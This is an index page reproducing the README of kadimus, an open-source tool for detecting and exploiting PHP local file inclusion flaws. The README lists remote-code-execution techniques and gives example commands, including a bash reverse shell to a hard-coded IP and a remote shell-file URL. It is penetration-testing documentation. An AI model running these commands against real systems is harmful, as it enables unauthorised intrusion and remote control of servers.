Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/P0cL4bs/kadimus
kadimus is a tool to check and exploit lfi vulnerability.
https://github.com/P0cL4bs/kadimus
Last synced: about 2 months ago
JSON representation
kadimus is a tool to check and exploit lfi vulnerability.
- Host: GitHub
- URL: https://github.com/P0cL4bs/kadimus
- Owner: P0cL4bs
- License: mit
- Archived: true
- Created: 2015-06-26T23:20:53.000Z (over 9 years ago)
- Default Branch: master
- Last Pushed: 2020-08-17T12:01:23.000Z (over 4 years ago)
- Last Synced: 2024-08-01T09:24:28.830Z (5 months ago)
- Language: C
- Homepage:
- Size: 239 KB
- Stars: 510
- Watchers: 31
- Forks: 137
- Open Issues: 7
-
Metadata Files:
- Readme: README.md
- License: license.txt
Awesome Lists containing this project
- awesome-csirt - kadimus
README
[![Rawsec's CyberSecurity Inventory](https://inventory.rawsec.ml/img/badges/Rawsec-inventoried-FF5050_flat.svg)](https://inventory.rawsec.ml/tools.html#Kadimus)
[![GitHub stars](https://img.shields.io/github/stars/P0cL4bs/Kadimus.svg)](https://github.com/P0cL4bs/Kadimus/stargazers)
[![GitHub license](https://img.shields.io/github/license/P0cL4bs/Kadimus.svg)](https://github.com/P0cL4bs/Kadimus/blob/master/license.txt)# kadimus
LFI Scan & Exploit Tool
--
kadimus is a tool to check for and exploit LFI vulnerabilities, with a focus on PHP systems.Features:
- [x] Check all url parameters
- [x] /var/log/auth.log RCE
- [x] /proc/self/environ RCE
- [x] php://input RCE
- [x] data://text RCE
- [x] expect://cmd RCE
- [x] Source code disclosure
- [x] Command shell interface through HTTP request
- [x] Proxy support (socks4://, socks4a://, socks5:// ,socks5h:// and http://)
- [x] Proxy socks5 support for remote connections## Compile:
First, make sure you have all dependencies installed in your system: `libcurl`, `libopenssl`, `libpcre` and `libssh`.
Then you can clone the repository, to get the source code:
```sh
$ git clone https://github.com/P0cL4bs/kadimus.git
$ cd kadimus
```### And finally:
```sh
$ make
```## Options:
```
Options:
-h, --help Display this help menuRequest:
-B, --cookie STRING Set custom HTTP cookie header
-A, --user-agent STRING User-Agent to send to server
--connect-timeout SECONDS Maximum time allowed for connection
--retry NUMBER Number of times to retry if connection fails
--proxy STRING Proxy to connect (syntax: protocol://hostname:port)Scanner:
-u, --url STRING URL to scan/exploit
-o, --output FILE File to save output resultsExplotation:
--parameter STRING Parameter name to inject exploit
(only needed by RCE data and source disclosure)RCE:
-T, --technique=TECH LFI to RCE technique to use
-C, --code STRING Custom PHP code to execute, with php brackets
-c, --cmd STRING Execute system command on vulnerable target system
-s, --shell Simple command shell interface through HTTP request--connect STRING IP/hostname to connect to
-p, --port NUMBER Port number to connect to or listen on
-l, --listen Bind and listen for incoming connections--ssh-port NUMBER Set the SSH port to try command injection (default: 22)
--ssh-target STRING Set the SSH hostRCE Available techniques
environ Try to run PHP code using /proc/self/environ
input Try to run PHP code using php://input
auth Try to run PHP code using /var/log/auth.log
data Try to run PHP code using data://text
expect Try to run a command using expect://cmdSource Disclosure:
-S, --source Try to get the source file using filter://
-f, --filename STRING Set filename to grab source [REQUIRED]
-O FILE Set output file (default: stdout)```
## Examples:
### Scanning:
```
./kadimus -u localhost/?pg=contact -A my_user_agent
```### Get source code of file:
```
./kadimus -u localhost/?pg=contact -S -f "index.php%00" -O local_output.php --parameter pg
```### Execute php code:
```
./kadimus -u localhost/?pg=php://input%00 -C '' -T input
```### Execute command:
```
./kadimus -t localhost/?pg=/var/log/auth.log -T auth -c 'ls -lah' --ssh-target localhost
```### Checking for RFI:
You can also check for RFI errors -- just put the remote URL in resource/common_files.txt
and the regex to identify them, example:```php
/* http://bad-url.com/shell.txt */```
in file:
```
http://bad-url.com/shell.txt?:scorpion say get over here
```### Reverse shell:
```
./kadimus -u localhost/?pg=contact.php -T data --parameter pg -lp 12345 -c '/bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/1234 0>&1"' --retry-times 0
```Contributing
------------
You can help with code, or by donating.
If you want to help with code, use the kernel code style as a reference.Paypal: [![](https://www.paypalobjects.com/en_US/i/btn/btn_donate_SM.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=RAG26EKAYHQSY¤cy_code=BRL&source=url)
BTC: 1PpbrY6j1HNPF7fS2LhG9SF2wtyK98GSwq